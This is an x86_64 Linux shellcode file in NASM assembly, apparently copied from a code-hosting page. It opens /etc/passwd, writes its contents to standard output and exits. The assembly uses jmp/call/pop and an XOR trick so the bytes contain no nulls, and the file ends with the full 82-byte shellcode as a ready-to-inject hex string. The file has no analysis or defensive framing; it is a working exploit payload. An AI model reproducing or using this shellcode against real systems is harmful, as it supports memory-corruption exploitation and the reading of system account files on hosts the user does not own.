51 lines
No EOL
1,019 B
NASM
51 lines
No EOL
1,019 B
NASM
BITS 64
|
|
; Author Mr.Un1k0d3r - RingZer0 Team
|
|
; Read /etc/passwd Linux x86_64 Shellcode
|
|
; Shellcode size 82 bytes
|
|
global _start
|
|
|
|
section .text
|
|
|
|
_start:
|
|
jmp _push_filename
|
|
|
|
_readfile:
|
|
; syscall open file
|
|
pop rdi ; pop path value
|
|
; NULL byte fix
|
|
xor byte [rdi + 11], 0x41
|
|
|
|
xor rax, rax
|
|
add al, 2
|
|
xor rsi, rsi ; set O_RDONLY flag
|
|
syscall
|
|
|
|
; syscall read file
|
|
sub sp, 0xfff
|
|
lea rsi, [rsp]
|
|
mov rdi, rax
|
|
xor rdx, rdx
|
|
mov dx, 0xfff; size to read
|
|
xor rax, rax
|
|
syscall
|
|
|
|
; syscall write to stdout
|
|
xor rdi, rdi
|
|
add dil, 1 ; set stdout fd = 1
|
|
mov rdx, rax
|
|
xor rax, rax
|
|
add al, 1
|
|
syscall
|
|
|
|
; syscall exit
|
|
xor rax, rax
|
|
add al, 60
|
|
syscall
|
|
|
|
_push_filename:
|
|
call _readfile
|
|
path: db "/etc/passwdA"
|
|
|
|
Shellcode:
|
|
|
|
\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41 |